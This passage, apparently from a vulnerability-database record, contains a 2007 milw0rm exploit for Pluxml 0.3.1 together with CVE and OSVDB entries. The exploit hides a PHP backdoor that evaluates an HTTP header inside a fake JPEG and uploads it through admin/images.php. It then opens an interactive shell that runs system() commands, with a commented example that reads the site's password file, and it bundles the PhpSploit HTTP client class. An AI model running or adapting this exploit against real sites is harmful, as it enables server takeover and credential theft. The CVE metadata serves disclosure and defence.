'Image envoy\u0102\u0083\u00c2\u0160e';\n\t# 18. }else{\n\t# 19.\t $msg = 'Le fichier n\\'est pas une image';\n\t# 20. }\n\t# 21. header('Location: images.php?msg='.$msg);\n\t# 22. }\n\t#\n\t# Fake JPG 1x1\n\t# 000000A0 007F 3C3F 7068 700D 0A69 6628 6973 7365 ..<?php..if(isse\n\t# 000000B0 7428 245F 5345 5256 4552 5B48 5454 505F t($_SERVER[HTTP_\n\t# 000000C0 5348 454C 4C5D 2929 0D0A 7B0D 0A70 7269 SHELL]))..{..pri\n\t# 000000D0 6E74 2031 3233 3435 3637 3839 3130 3131 nt 1234567891011\n\t# 000000E0 3132 3B0D 0A65 7661 6C28 245F 5345 5256 12;..eval($_SERV\n\t# 000000F0 4552 5B48 5454 505F 5348 454C 4C5D 293B ER[HTTP_SHELL]);\n\t# 00000100 0D0A 7072 696E 7420 3132 3334 3536 3738 ..print 12345678\n\t# 00000110 3931 3031 3131 323B 0D0A 7D0D 0A3F 3EFF 9101112;..}..?\\>.\n\t#\n\t$fakejpg =\n\t\"\\xFF\\xD8\\xFF\\xE0\\x00\\x10\\x4A\\x46\\x49\\x46\\x00\\x01\\x01\\x01\\x00\"\n\t.\"\\x60\\x00\\x60\\x00\\x00\\xFF\\xDB\\x00\\x43\\x00\\x08\\x06\\x06\\x07\\x06\"\n\t.\"\\x05\\x08\\x07\\x07\\x07\\x09\\x09\\x08\\x0A\\x0C\\x14\\x0D\\x0C\\x0B\\x0B\"\n\t.\"\\x0C\\x19\\x12\\x13\\x0F\\x14\\x1D\\x1A\\x1F\\x1E\\x1D\\x1A\\x1C\\x1C\\x20\"\n\t.\"\\x24\\x2E\\x27\\x20\\x22\\x2C\\x23\\x1C\\x1C\\x28\\x37\\x29\\x2C\\x30\\x31\"\n\t.\"\\x34\\x34\\x34\\x1F\\x27\\x39\\x3D\\x38\\x32\\x3C\\x2E\\x33\\x34\\x32\\xFF\"\n\t.\"\\xDB\\x00\\x43\\x01\\x09\\x09\\x09\\x0C\\x0B\\x0C\\x18\\x0D\\x0D\\x18\\x32\"\n\t.\"\\x21\\x1C\\x21\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\"\n\t.\"\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\"\n\t.\"\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\"\n\t.\"\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\xFF\\xFE\\x00\\x7F\\x3C\\x3F\\x70\"\n\t.\"\\x68\\x70\\x0D\\x0A\\x69\\x66\\x28\\x69\\x73\\x73\\x65\\x74\\x28\\x24\\x5F\"\n\t.\"\\x53\\x45\\x52\\x56\\x45\\x52\\x5B\\x48\\x54\\x54\\x50\\x5F\\x53\\x48\\x45\"\n\t.\"\\x4C\\x4C\\x5D\\x29\\x29\\x0D\\x0A\\x7B\\x0D\\x0A\\x70\\x72\\x69\\x6E\\x74\"\n\t.\"\\x20\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x31\\x30\\x31\\x31\\x31\"\n\t.\"\\x32\\x3B\\x0D\\x0A\\x65\\x76\\x61\\x6C\\x28\\x24\\x5F\\x53\\x45\\x52\\x56\"\n\t.\"\\x45\\x52\\x5B\\x48\\x54\\x54\\x50\\x5F\\x53\\x48\\x45\\x4C\\x4C\\x5D\\x29\"\n\t.\"\\x3B\\x0D\\x0A\\x70\\x72\\x69\\x6E\\x74\\x20\\x31\\x32\\x33\\x34\\x35\\x36\"\n\t.\"\\x37\\x38\\x39\\x31\\x30\\x31\\x31\\x31\\x32\\x3B\\x0D\\x0A\\x7D\\x0D\\x0A\"\n\t.\"\\x3F\\x3E\\xFF\\xC0\\x00\\x11\\x08\\x00\\x01\\x00\\x01\\x03\\x01\\x22\\x00\"\n\t.\"\\x02\\x11\\x01\\x03\\x11\\x01\\xFF\\xC4\\x00\\x1F\\x00\\x00\\x01\\x05\\x01\"\n\t.\"\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\"\n\t.\"\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0A\\x0B\\xFF\\xC4\\x00\\xB5\\x10\\x00\"\n\t.\"\\x02\\x01\\x03\\x03\\x02\\x04\\x03\\x05\\x05\\x04\\x04\\x00\\x00\\x01\\x7D\"\n\t.\"\\x01\\x02\\x03\\x00\\x04\\x11\\x05\\x12\\x21\\x31\\x41\\x06\\x13\\x51\\x61\"\n\t.\"\\x07\\x22\\x71\\x14\\x32\\x81\\x91\\xA1\\x08\\x23\\x42\\xB1\\xC1\\x15\\x52\"\n\t.\"\\xD1\\xF0\\x24\\x33\\x62\\x72\\x82\\x09\\x0A\\x16\\x17\\x18\\x19\\x1A\\x25\"\n\t.\"\\x26\\x27\\x28\\x29\\x2A\\x34\\x35\\x36\\x37\\x38\\x39\\x3A\\x43\\x44\\x45\"\n\t.\"\\x46\\x47\\x48\\x49\\x4A\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5A\\x63\\x64\"\n\t.\"\\x65\\x66\\x67\\x68\\x69\\x6A\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7A\\x83\"\n\t.\"\\x84\\x85\\x86\\x87\\x88\\x89\\x8A\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\"\n\t.\"\\x9A\\xA2\\xA3\\xA4\\xA5\\xA6\\xA7\\xA8\\xA9\\xAA\\xB2\\xB3\\xB4\\xB5\\xB6\"\n\t.\"\\xB7\\xB8\\xB9\\xBA\\xC2\\xC3\\xC4\\xC5\\xC6\\xC7\\xC8\\xC9\\xCA\\xD2\\xD3\"\n\t.\"\\xD4\\xD5\\xD6\\xD7\\xD8\\xD9\\xDA\\xE1\\xE2\\xE3\\xE4\\xE5\\xE6\\xE7\\xE8\"\n\t.\"\\xE9\\xEA\\xF1\\xF2\\xF3\\xF4\\xF5\\xF6\\xF7\\xF8\\xF9\\xFA\\xFF\\xC4\\x00\"\n\t.\"\\x1F\\x01\\x00\\x03\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x00\"\n\t.\"\\x00\\x00\\x00\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0A\\x0B\"\n\t.\"\\xFF\\xC4\\x00\\xB5\\x11\\x00\\x02\\x01\\x02\\x04\\x04\\x03\\x04\\x07\\x05\"\n\t.\"\\x04\\x04\\x00\\x01\\x02\\x77\\x00\\x01\\x02\\x03\\x11\\x04\\x05\\x21\\x31\"\n\t.\"\\x06\\x12\\x41\\x51\\x07\\x61\\x71\\x13\\x22\\x32\\x81\\x08\\x14\\x42\\x91\"\n\t.\"\\xA1\\xB1\\xC1\\x09\\x23\\x33\\x52\\xF0\\x15\\x62\\x72\\xD1\\x0A\\x16\\x24\"\n\t.\"\\x34\\xE1\\x25\\xF1\\x17\\x18\\x19\\x1A\\x26\\x27\\x28\\x29\\x2A\\x35\\x36\"\n\t.\"\\x37\\x38\\x39\\x3A\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4A\\x53\\x54\\x55\"\n\t.\"\\x56\\x57\\x58\\x59\\x5A\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6A\\x73\\x74\"\n\t.\"\\x75\\x76\\x77\\x78\\x79\\x7A\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8A\"\n\t.\"\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9A\\xA2\\xA3\\xA4\\xA5\\xA6\\xA7\"\n\t.\"\\xA8\\xA9\\xAA\\xB2\\xB3\\xB4\\xB5\\xB6\\xB7\\xB8\\xB9\\xBA\\xC2\\xC3\\xC4\"\n\t.\"\\xC5\\xC6\\xC7\\xC8\\xC9\\xCA\\xD2\\xD3\\xD4\\xD5\\xD6\\xD7\\xD8\\xD9\\xDA\"\n\t.\"\\xE2\\xE3\\xE4\\xE5\\xE6\\xE7\\xE8\\xE9\\xEA\\xF2\\xF3\\xF4\\xF5\\xF6\\xF7\"\n\t.\"\\xF8\\xF9\\xFA\\xFF\\xDA\\x00\\x0C\\x03\\x01\\x00\\x02\\x11\\x03\\x11\\x00\"\n\t.\"\\x3F\\x00\\xF7\\xFA\\x28\\xA2\\x80\\x3F\\xFF\\xD9\";\n\t\n\t$formdata = array(\n\t frmdt_url => $hack.'pluxml/admin/images.php',\n\t 'userfile' => array(\n\t frmdt_filename => 'iwashere.php',\n\t frmdt_content => $fakejpg));\n\n\t$xpl->formdata($formdata);\n\tprint \"\\n\\$shell> \";\n\n\twhile(!preg_match('#^(quit|exit)$#', ($cmd = trim(fgets(STDIN)))))\n\t{\n\t\t# $shell> cat ../pluxml/conf/password.xml\n\t\t########################################\n\t\t$xpl->addheader('Shell',\"system('$cmd');\");\n\t\t$xpl->get($hack.'images/iwashere.php');\n\t\t$content = explode('1.23456789101E+014',$xpl->getcontent());\n\t\tprint $content[1].\"\\n\\$shell> \";\n\t}\n\texit(0);\n}\n\n/*\n * \n * Copyright (C) darkfig\n * \n * This program is free software; you can redistribute it and/or \n * modify it under the terms of the GNU General Public License \n * as published by the Free Software Foundation; either version 2 \n * of the License, or (at your option) any later version. \n * \n * This program is distributed in the hope that it will be useful, \n * but WITHOUT ANY WARRANTY; without even the implied warranty of \n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n * GNU General Public License for more details. \n * \n * You should have received a copy of the GNU General Public License \n * along with this program; if not, write to the Free Software \n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n * \n * TITLE: PhpSploit Class\n * REQUIREMENTS: PHP 4 / PHP 5\n * VERSION: 2.0\n * LICENSE: GNU General Public License\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\n * FILENAME: phpsploitclass.php\n *\n * CONTACT: gmdarkfig@gmail.com (french / english)\n * GREETZ: Sparah, Ddx39\n *\n * DESCRIPTION:\n * The phpsploit is a class implementing a web user agent.\n * You can add cookies, headers, use a proxy server with (or without) a\n * basic authentification. It supports the GET and the POST method. It can\n * also be used like a browser with the cookiejar() function (which allow\n * a server to add several cookies for the next requests) and the\n * allowredirection() function (which allow the script to follow all\n * redirections sent by the server). It can return the content (or the\n * headers) of the request. Others useful functions can be used for debugging.\n * A manual is actually in development but to know how to use it, you can\n * read the comments.\n *\n * CHANGELOG:\n *\n * [2007-06-10] (2.0)\n * * Code: Code optimization\n * * New: Compatible with PHP 4 by default\n *\n * [2007-01-24] (1.2)\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\n * * New: multipart/form-data enctype is now supported \n *\n * [2006-12-31] (1.1)\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\n * * New: You can now call the getheader() / getcontent() function without parameters\n *\n * [2006-12-30] (1.0)\n * * First version\n * \n */\n\nclass phpsploit\n{\n\tvar $proxyhost;\n\tvar $proxyport;\n\tvar $host;\n\tvar $path;\n\tvar $port;\n\tvar $method;\n\tvar $url;\n\tvar $packet;\n\tvar $proxyuser;\n\tvar $proxypass;\n\tvar $header;\n\tvar $cookie;\n\tvar $data;\n\tvar $boundary;\n\tvar $allowredirection;\n\tvar $last_redirection;\n\tvar $cookiejar;\n\tvar $recv;\n\tvar $cookie_str;\n\tvar $header_str;\n\tvar $server_content;\n\tvar $server_header;\n\t\n\n\t/**\n\t * This function is called by the\n\t * get()/post()/formdata() functions.\n\t * You don't have to call it, this is\n\t * the main function.\n\t *\n\t * @access private\n\t * @return string $this->recv ServerResponse\n\t * \n\t */\n\tfunction sock()\n\t{\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport))\n\t\t $socket = @fsockopen($this->proxyhost,$this->proxyport);\n\t\telse\n\t\t $socket = @fsockopen($this->host,$this->port);\n\t\t\n\t\tif(!$socket)\n\t\t die(\"Error: Host seems down\");\n\t\t\n\t\tif($this->method=='get')\n\t\t $this->packet = 'GET '.$this->url.\" HTTP/1.1\\r\\n\";\n\t\t \n\t\telseif($this->method=='post' or $this->method=='formdata')\n\t\t $this->packet = 'POST '.$this->url.\" HTTP/1.1\\r\\n\";\n\t\t \n\t\telse\n\t\t die(\"Error: Invalid method\");\n\t\t\n\t\tif(!empty($this->proxyuser))\n\t\t $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass).\"\\r\\n\";\n\t\t\n\t\tif(!empty($this->header))\n\t\t $this->packet .= $this->showheader();\n\t\t \n\t\tif(!empty($this->cookie))\n\t\t $this->packet .= 'Cookie: '.$this->showcookie().\"\\r\\n\";\n\t\n\t\t$this->packet .= 'Host: '.$this->host.\"\\r\\n\";\n\t\t$this->packet .= \"Connection: Close\\r\\n\";\n\t\t\n\t\tif($this->method=='post')\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\t\t\t$this->packet .= 'Content-Length: '.strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data.\"\\r\\n\";\n\t\t}\n\t\telseif($this->method=='formdata')\n\t\t{\n\t\t\t$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary.\"\\r\\n\";\n\t\t\t$this->packet .= 'Content-Length: '.strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data;\n\t\t}\n\n\t\t$this->packet .= \"\\r\\n\";\n\t\t$this->recv = '';\n\n\t\tfputs($socket,$this->packet);\n\n\t\twhile(!feof($socket))\n\t\t $this->recv .= fgets($socket);\n\n\t\tfclose($socket);\n\n\t\tif($this->cookiejar)\n\t\t $this->getcookie();\n\n\t\tif($this->allowredirection)\n\t\t return $this->getredirection();\n\t\telse\n\t\t return $this->recv;\n\t}\n\t\n\n\t/**\n\t * This function allows you to add several\n\t * cookies in the request.\n\t * \n\t * @access public\n\t * @param string cookn CookieName\n\t * @param string cookv CookieValue\n\t * @example $this->addcookie('name','value')\n\t * \n\t */\n\tfunction addcookie($cookn,$cookv)\n\t{\n\t\tif(!isset($this->cookie))\n\t\t $this->cookie = array();\n\n\t\t$this->cookie[$cookn] = $cookv;\n\t}\n\n\n\t/**\n\t * This function allows you to add several\n\t * headers in the request.\n\t *\n\t * @access public\n\t * @param string headern HeaderName\n\t * @param string headervalue Headervalue\n\t * @example $this->addheader('Client-IP', '128.5.2.3')\n\t * \n\t */\n\tfunction addheader($headern,$headervalue)\n\t{\n\t\tif(!isset($this->header))\n\t\t $this->header = array();\n\t\t \n\t\t$this->header[$headern] = $headervalue;\n\t}\n\n\n\t/**\n\t * This function allows you to use an\n\t * http proxy server. Several methods\n\t * are supported.\n\t * \n\t * @access public\n\t * @param string proxy ProxyHost\n\t * @param integer proxyp ProxyPort\n\t * @example $this->proxy('localhost',8118)\n\t * @example $this->proxy('localhost:8118')\n\t * \n\t */\n\tfunction proxy($proxy,$proxyp='')\n\t{\n\t\tif(empty($proxyp))\n\t\t{\n\t\t\t$proxarr = explode(':',$proxy);\n\t\t\t$this->proxyhost = $proxarr[0];\n\t\t\t$this->proxyport = (int)$proxarr[1];\n\t\t}\n\t\telse \n\t\t{\n\t\t\t$this->proxyhost = $proxy;\n\t\t\t$this->proxyport = (int)$proxyp;\n\t\t}\n\n\t\tif($this->proxyport > 65535)\n\t\t die(\"Error: Invalid port number\");\n\t}\n\t\n\n\t/**\n\t * This function allows you to use an\n\t * http proxy server which requires a\n\t * basic authentification. Several\n\t * methods are supported:\n\t *\n\t * @access public\n\t * @param string proxyauth ProxyUser\n\t * @param string proxypass ProxyPass\n\t * @example $this->proxyauth('user','pwd')\n\t * @example $this->proxyauth('user:pwd');\n\t * \n\t */\n\tfunction proxyauth($proxyauth,$proxypass='')\n\t{\n\t\tif(empty($proxypass))\n\t\t{\n\t\t\t$posvirg = strpos($proxyauth,':');\n\t\t\t$this->proxyuser = substr($proxyauth,0,$posvirg);\n\t\t\t$this->proxypass = substr($proxyauth,$posvirg+1);\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$this->proxyuser = $proxyauth;\n\t\t\t$this->proxypass = $proxypass;\n\t\t}\n\t}\n\n\n\t/**\n\t * This function allows you to set\n\t * the 'User-Agent' header.\n\t * \n\t * @access public\n\t * @param string useragent Agent\n\t * @example $this->agent('Firefox')\n\t * \n\t */\n\tfunction agent($useragent)\n\t{\n\t\t$this->addheader('User-Agent',$useragent);\n\t}\n\n\t\n\t/**\n\t * This function returns the headers\n\t * which will be in the next request.\n\t * \n\t * @access public\n\t * @return string $this->header_str Headers\n\t * @example $this->showheader()\n\t * \n\t */\n\tfunction showheader()\n\t{\n\t\t$this->header_str = '';\n\t\t\n\t\tif(!isset($this->header))\n\t\t return;\n\t\t \n\t\tforeach($this->header as $name => $value)\n\t\t $this->header_str .= $name.': '.$value.\"\\r\\n\";\n\t\t \n\t\treturn $this->header_str;\n\t}\n\n\t\n\t/**\n\t * This function returns the cookies\n\t * which will be in the next request.\n\t * \n\t * @access public\n\t * @return string $this->cookie_str Cookies\n\t * @example $this->showcookie()\n\t * \n\t */\n\tfunction showcookie()\n\t{\n\t\t$this->cookie_str = '';\n\t\t\n\t\tif(!isset($this->cookie))\n\t\t return;\n\t\t\n\t\tforeach($this->cookie as $name => $value)\n\t\t $this->cookie_str .= $name.'='.$value.'; ';\n\n\t\treturn $this->cookie_str;\n\t}\n\n\n\t/**\n\t * This function returns the last\n\t * formed http request.\n\t * \n\t * @access public\n\t * @return string $this->packet HttpPacket\n\t * @example $this->showlastrequest()\n\t * \n\t */\n\tfunction showlastrequest()\n\t{\n\t\tif(!isset($this->packet))\n\t\t return;\n\t\telse\n\t\t return $this->packet;\n\t}\n\n\n\t/**\n\t * This function sends the formed\n\t * http packet with the GET method.\n\t * \n\t * @access public\n\t * @param string url Url\n\t * @return string $this->sock()\n\t * @example $this->get('localhost/index.php?var=x')\n\t * @example $this->get('http://localhost:88/tst.php')\n\t * \n\t */\n\tfunction get($url)\n\t{\n\t\t$this->target($url);\n\t\t$this->method = 'get';\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function sends the formed\n\t * http packet with the POST method.\n\t *\n\t * @access public\n\t * @param string url Url\n\t * @param string data PostData\n\t * @return string $this->sock()\n\t * @example $this->post('http://localhost/','helo=x')\n\t * \n\t */\t\n\tfunction post($url,$data)\n\t{\n\t\t$this->target($url);\n\t\t$this->method = 'post';\n\t\t$this->data = $data;\n\t\treturn $this->sock();\n\t}\n\t\n\n\t/**\n\t * This function sends the formed http\n\t * packet with the POST method using\n\t * the multipart/form-data enctype.\n\t * \n\t * @access public\n\t * @param array array FormDataArray\n\t * @return string $this->sock()\n\t * @example $formdata = array(\n\t * frmdt_url => 'http://localhost/upload.php',\n\t * frmdt_boundary => '123456', # Optional\n\t * 'var' => 'example',\n\t * 'file' => array(\n\t * frmdt_type => 'image/gif', # Optional\n\t * frmdt_transfert => 'binary' # Optional\n\t * frmdt_filename => 'hello.php,\n\t * frmdt_content => '<?php echo 1; ?>'));\n\t * $this->formdata($formdata);\n\t * \n\t */\n\tfunction formdata($array)\n\t{\n\t\t$this->target($array[frmdt_url]);\n\t\t$this->method = 'formdata';\n\t\t$this->data = '';\n\t\t\n\t\tif(!isset($array[frmdt_boundary]))\n\t\t $this->boundary = 'phpsploit';\n\t\telse\n\t\t $this->boundary = $array[frmdt_boundary];\n\n\t\tforeach($array as $key => $value)\n\t\t{\n\t\t\tif(!preg_match('#^frmdt_(boundary|url)#',$key))\n\t\t\t{\n\t\t\t\t$this->data .= str_repeat('-',29).$this->boundary.\"\\r\\n\";\n\t\t\t\t$this->data .= 'Content-Disposition: form-data; name=\"'.$key.'\";';\n\t\t\t\t\n\t\t\t\tif(!is_array($value))\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\";\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->data .= ' filename=\"'.$array[$key][frmdt_filename].\"\\\";\\r\\n\";\n\n\t\t\t\t\tif(isset($array[$key][frmdt_type]))\n\t\t\t\t\t $this->data .= 'Content-Type: '.$array[$key][frmdt_type].\"\\r\\n\";\n\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert]))\n\t\t\t\t\t $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert].\"\\r\\n\";\n\n\t\t\t\t\t$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\";\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t$this->data .= str_repeat('-',29).$this->boundary.\"--\\r\\n\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function returns the content\n\t * of the server response, without\n\t * the headers.\n\t * \n\t * @access public\n\t * @param string code ServerResponse\n\t * @return string $this->server_content\n\t * @example $this->getcontent()\n\t * @example $this->getcontent($this->get('http://localhost/'))\n\t * \n\t */\n\tfunction getcontent($code='')\n\t{\n\t\tif(empty($code))\n\t\t $code = $this->recv;\n\n\t\t$code = explode(\"\\r\\n\\r\\n\",$code);\n\t\t$this->server_content = '';\n\t\t\n\t\tfor($i=1;$i<count($code);$i++)\n\t\t $this->server_content .= $code[$i];\n\n\t\treturn $this->server_content;\n\t}\n\n\t\n\t/**\n\t * This function returns the headers\n\t * of the server response, without\n\t * the content.\n\t * \n\t * @access public\n\t * @param string code ServerResponse\n\t * @return string $this->server_header\n\t * @example $this->getcontent()\n\t * @example $this->getcontent($this->post('http://localhost/','1=2'))\n\t * \n\t */\n\tfunction getheader($code='')\n\t{\n\t\tif(empty($code))\n\t\t $code = $this->recv;\n\n\t\t$code = explode(\"\\r\\n\\r\\n\",$code);\n\t\t$this->server_header = $code[0];\n\t\t\n\t\treturn $this->server_header;\n\t}\n\n\t\n\t/**\n\t * This function is called by the\n\t * cookiejar() function. It adds the\n\t * value of the \"Set-Cookie\" header\n\t * in the \"Cookie\" header for the\n\t * next request. You don't have to\n\t * call it.\n\t * \n\t * @access private\n\t * @param string code ServerResponse\n\t * \n\t */\n\tfunction getcookie()\n\t{\n\t\tforeach(explode(\"\\r\\n\",$this->getheader()) as $header)\n\t\t{\n\t\t\tif(preg_match('/set-cookie/i',$header))\n\t\t\t{\n\t\t\t\t$fequal = strpos($header,'=');\n\t\t\t\t$fvirgu = strpos($header,';');\n\t\t\t\t\n\t\t\t\t// 12=strlen('set-cookie: ')\n\t\t\t\t$cname = substr($header,12,$fequal-12);\n\t\t\t\t$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));\n\t\t\t\t\n\t\t\t\t$this->cookie[trim($cname)] = trim($cvalu);\n\t\t\t}\n\t\t}\n\t}\n\n\n\t/**\n\t * This function is called by the\n\t * get()/post() functions. You\n\t * don't have to call it.\n\t *\n\t * @access private\n\t * @param string urltarg Url\n\t * @example $this->target('http://localhost/')\n\t * \n\t */\n\tfunction target($urltarg)\n\t{\n\t\tif(!ereg('^http://',$urltarg))\n\t\t $urltarg = 'http://'.$urltarg;\n\t\t \n\t\t$urlarr = parse_url($urltarg);\n\t\t$this->url = 'http://'.$urlarr['host'].$urlarr['path'];\n\t\t\n\t\tif(isset($urlarr['query']))\n\t\t $this->url .= '?'.$urlarr['query'];\n\t\t\n\t\t$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;\n\t\t$this->host = $urlarr['host'];\n\t\t\n\t\tif($this->port != '80')\n\t\t $this->host .= ':'.$this->port;\n\n\t\tif(!isset($urlarr['path']) or empty($urlarr['path']))\n\t\t die(\"Error: No path precised\");\n\n\t\t$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);\n\n\t\tif($this->port > 65535)\n\t\t die(\"Error: Invalid port number\");\n\t}\n\t\n\t\n\t/**\n\t * If you call this function,\n\t * the script will extract all\n\t * 'Set-Cookie' headers values\n\t * and it will automatically add\n\t * them into the 'Cookie' header\n\t * for all next requests.\n\t *\n\t * @access public\n\t * @param integer code 1(enabled) 0(disabled)\n\t * @example $this->cookiejar(0)\n\t * @example $this->cookiejar(1)\n\t * \n\t */\n\tfunction cookiejar($code)\n\t{\n\t\tif($code=='0')\n\t\t $this->cookiejar=FALSE;\n\n\t\telseif($code=='1')\n\t\t $this->cookiejar=TRUE;\n\t}\n\n\n\t/**\n\t * If you call this function,\n\t * the script will follow all\n\t * redirections sent by the server.\n\t * \n\t * @access public\n\t * @param integer code 1(enabled) 0(disabled)\n\t * @example $this->allowredirection(0)\n\t * @example $this->allowredirection(1)\n\t * \n\t */\n\tfunction allowredirection($code)\n\t{\n\t\tif($code=='0')\n\t\t $this->allowredirection=FALSE;\n\t\t \n\t\telseif($code=='1')\n\t\t $this->allowredirection=TRUE;\n\t}\n\n\t\n\t/**\n\t * This function is called if\n\t * allowredirection() is enabled.\n\t * You don't have to call it.\n\t *\n\t * @access private\n\t * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)\n\t * @return string $this->get($this->last_redirection)\n\t * @return string $this->recv;\n\t * \n\t */\n\tfunction getredirection()\n\t{\n\t\tif(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))\n\t\t{\n\t\t\t$this->last_redirection = trim($codearr[2]);\n\t\t\t\n\t\t\tif(!ereg('://',$this->last_redirection))\n\t\t\t return $this->get('http://'.$this->host.$this->path.$this->last_redirection);\n\n\t\t\telse\n\t\t\t return $this->get($this->last_redirection);\n\t\t}\n\t\telse\n\t\t return $this->recv;\n\t}\n\n\n\t/**\n\t * This function allows you\n\t * to reset some parameters.\n\t * \n\t * @access public\n\t * @param string func Param\n\t * @example $this->reset('header')\n\t * @example $this->reset('cookie')\n\t * @example $this->reset()\n\t * \n\t */\n\tfunction reset($func='')\n\t{\n\t\tswitch($func)\n\t\t{\n\t\t\tcase 'header':\n\t\t\t$this->header = array('');\n\t\t\tbreak;\n\t\t\t\t\n\t\t\tcase 'cookie':\n\t\t\t$this->cookie = array('');\n\t\t\tbreak;\n\t\t\t\t\n\t\t\tdefault:\n\t\t\t$this->cookiejar = '';\n\t\t\t$this->header = array('');\n\t\t\t$this->cookie = array('');\n\t\t\t$this->allowredirection = '';\n\t\t\tbreak;\n\t\t}\n\t}\n}\n?>\n\n# milw0rm.com [2007-06-24]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2007-3542", "type": "cve", "title": "CVE-2007-3542", "description": "Cross-site scripting (XSS) vulnerability in admin/auth.php in Pluxml 0.3.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.", "published": "2007-07-03T16:30:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3542", "cvelist": ["CVE-2007-3542"], "lastseen": "2017-09-29T14:25:24"}, {"id": "CVE-2007-3432", "type": "cve", "title": "CVE-2007-3432", "description": "Unrestricted file upload vulnerability in admin/images.php in Pluxml 0.3.1 allows remote attackers to upload and execute arbitrary PHP code via a .jpg filename.", "published": "2007-06-26T20:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3432", "cvelist": ["CVE-2007-3432"], "lastseen": "2017-10-11T11:07:13"}], "osvdb": [{"id": "OSVDB:38890", "type": "osvdb", "title": "Pluxml admin/auth.php msg Variable XSS", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 35015\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4096\n[CVE-2007-3542](https://vulners.com/cve/CVE-2007-3542)\n", "published": "2007-06-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:38890", "cvelist": ["CVE-2007-3542"], "lastseen": "2017-04-28T13:20:34"}]}}
